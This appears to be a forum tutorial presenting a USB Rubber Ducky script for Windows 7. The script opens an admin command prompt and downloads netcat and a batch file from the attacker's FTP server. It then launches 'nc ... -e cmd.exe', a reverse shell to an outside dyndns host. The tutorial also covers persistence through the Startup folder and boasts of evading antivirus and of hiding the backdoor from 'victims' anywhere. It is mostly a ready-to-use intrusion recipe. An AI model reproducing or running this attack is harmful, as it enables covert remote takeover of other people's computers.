My Strictly Netcat Reverse Shell
Ok this has a few requirements so it is not that user friendly but I like this method because after a few tests it has not been detected by any AV or other types of security programs.
Works on Windows 7
The first requirement is an FTP server. All windows boxes include an ftp client by default thats what I will be using to download the nc.exe and startup script .bat file. If Windows had a wget program we would not even need an FTP server. An anonymous server with upload and download turned on would be great for this but good luck finding one. So you will probably have to run an FTP server yourself like I have done.
So once you have an ftp server up and running download the windows version of netcat, unzip it and put the files into a directory called /tools/nc in the user your logging in with's root directory (you can always change my code so your ducky script will look in your specific directory you want it to for the nc files).
Download the windows version of netcat here http://www.downloadnetcat.com/. Scroll down and select download netcat windows version.
Now make a .bat file and add one line to it:
start nc yourserver.dyndns.org 8080 -d -e cmd.exe
Add that bat file to the same directory your netcat files are in. In my case /tools/nc
Now on your attacking computer you must listen for the incoming connection with this command:
nc -l -p 8080
Also remember to port forward port 8080 on your router to your internal listening attack computer!
Now that you have everything set up you are ready to put the ducky into a victims computer anywhere in the world. The only thing that can stop this is if the victims network fro some reason blocks 8080 inc or outgoing. In that case just change the port number. Ive tested this on a few Windows 7 systems and it went undetected on all of them. Each one had anti virus such as Mcafee and Norton. Firewalls on as well.
ESCAPE
CONTROL ESCAPE
DELAY 900
STRING cmd
DELAY 900
MENU
DELAY 900
STRING a
DELAY 900
ENTER
DELAY 1800
LEFTARROW
DELAY 900
ENTER
DELAY 900
STRING ftp
ENTER
DELAY 600
STRING open yourftpservernamehere.dyndns.org
ENTER
DELAY 900
STRING FtpUsernameHere
ENTER
DELAY 900
STRING YourFtpServersUsernamesPasswdHere
DELAY 500
ENTER
DELAY 1000
STRING cd tools
ENTER
DELAY 900
STRING cd nc
DELAY 900
ENTER
STRING mget *
DELAY 800
ENTER
DELAY 900
ENTER
DELAY 900
ENTER
DELAY 900
ENTER
DELAY 900
ENTER
DELAY 900
ENTER
DELAY 900
ENTER
DELAY 900
ENTER
DELAY 500
ENTER
STRING quit
ENTER
DELAY 400
STRING start nc yourlisteningsevernamehere.dyndns.org 8080 -d -e cmd.exe
ENTER
DELAY 400
STRING exit
ENTER
Now once your inside the victims computer issue the command:
move batfileyoumade.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Now there computer will run your netcat reverse shell whenever it boots.
You may have noticed I have some long delays. I have long delays because I tested on fast and SLOW computers which required the longer delays to work. You may also notice the "start" before the actual nc reverse shell command. This is the equivalent to the & in Linux to run a command in the background. Doing this enables us to exit out of the command prompt leaving less traces of the backdoor. So the only way the victim will see the backdoor is if they check things like task manager .
